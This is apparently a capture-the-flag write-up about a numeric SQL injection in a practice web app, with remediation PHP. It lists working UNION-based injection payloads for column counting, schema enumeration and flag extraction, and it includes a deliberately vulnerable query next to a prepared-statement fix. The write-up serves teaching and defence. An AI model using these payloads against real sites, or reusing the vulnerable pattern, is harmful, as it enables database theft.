Vulnerability analysis

The ghostcont application suffers from a numerical SQL injection vulnerability exploitable through the hidden input "ghostclass" of the results.php page. To test for the presence of the vulnerability with Burp Repeater we can send the following HTTP bodies to results.php:

searchstring=the&ghostclass=2

and:

searchstring=the&ghostclass=1%2b1

We can observe that the results are the same (except for the image at the top of the page, which depends on the "ghostclass" input without a SQL query). This confirms that the SQL expression "1+1" gets evaluated, so there is a numerical SQL injection vulnerability.

Exploitation

The vulnerability is non-blind, so we can exploit it with the UNION operator technique. The first thing to do is to check the number of columns of the UNION operation by sending:

searchstring=the&ghostclass=1+UNION+SELECT+null+--+
searchstring=the&ghostclass=1+UNION+SELECT+null,null+--+

etc., until it returns a page without errors. It turns out that there are two columns in the UNION operation, both of which are returned into the page. Now we have to reverse engineer the database with:

searchstring=the&ghostclass=1+UNION+SELECT+table_name,column_name+FROM+information_schema.columns+WHERE+table_schema=database()+--+

Through this we discover that there are two tables in the current schema: a "ghosts" table and a "flag" table which contains a single column named "flag". Now we can proceed to steal the flag by injecting:

searchstring=the&ghostclass=1+UNION+SELECT+flag,null+FROM+flag+--+

The flag will appear among the results.

Remediation

We cannot patch this by using mysqli_real_escape_string() because the vulnerable input is not a string. Thus the only approach is to use prepared statements.
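As an added illustration of the remediation (example code, not the ghostcont application's own results.php), here is a query that concatenates the unquoted numeric input the way the vulnerable page must, beside the same query as a mysqli prepared statement. The table name ghosts comes from the writeup; the column names name, description and ghostclass, the LIKE match on searchstring, and the connection credentials are assumptions.

```php
<?php
// Added example, not the ghostcont source. Assumed: a "ghosts" table with
// columns name, description and ghostclass (placeholder names), and the
// connection parameters below.
$db = new mysqli('localhost', 'ghostuser', 'password', 'ghostcont'); // assumed
$db->set_charset('utf8mb4');

// BEFORE: vulnerable. Escaping only protects a value inside a quoted string
// literal; ghostclass is interpolated unquoted, so MySQL evaluates "1+1"
// (or a UNION clause) as part of the query itself.
function search_vulnerable(mysqli $db, string $search, string $ghostclass): array
{
    $search = $db->real_escape_string($search);
    $sql = "SELECT name, description FROM ghosts "
         . "WHERE description LIKE '%$search%' AND ghostclass = $ghostclass";
    return $db->query($sql)->fetch_all(MYSQLI_ASSOC);
}

// AFTER: prepared statement. The query text reaches the server without the
// user values; they are bound afterwards, so the server never parses "1+1"
// or a UNION clause as SQL. Binding with type 'i' also forces a number.
function search_safe(mysqli $db, string $search, string $ghostclass): array
{
    // Reject anything that is not an integer before it reaches the database.
    $class = filter_var($ghostclass, FILTER_VALIDATE_INT);
    if ($class === false) {
        http_response_code(400);
        return [];
    }
    $stmt = $db->prepare(
        'SELECT name, description FROM ghosts '
        . 'WHERE description LIKE CONCAT(\'%\', ?, \'%\') AND ghostclass = ?'
    );
    $stmt->bind_param('si', $search, $class);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

$rows = search_safe($db, $_POST['searchstring'] ?? '', $_POST['ghostclass'] ?? '');
foreach ($rows as $row) {
    // Escape on output as well, so stored content cannot inject HTML.
    echo htmlspecialchars($row['name']), ': ',
         htmlspecialchars($row['description']), "<br>\n";
}
```

With the prepared version, the bodies used in the writeup (ghostclass=1%2b1 or a UNION payload) are rejected by the integer check with a 400, and even an integer that slips through is only ever compared as a bound value, never parsed as SQL.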